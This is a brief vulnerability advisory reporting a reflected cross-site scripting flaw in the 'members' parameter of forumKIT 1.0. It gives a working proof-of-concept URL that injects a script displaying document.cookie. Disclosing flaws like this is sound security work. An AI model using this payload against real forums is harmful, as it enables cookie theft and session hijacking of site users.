Vulnerable System : forumKIT 1.0 Description : an XSS is founded in the variable members that have the value 'true' you can exchange it with XSS Code . exploit : http://forum.target.com/f.aspx?members="><script>alert(document.cookie);</script> this exploit is discovered by : neO e-mail : al_modamer@xxxxxxxxxxx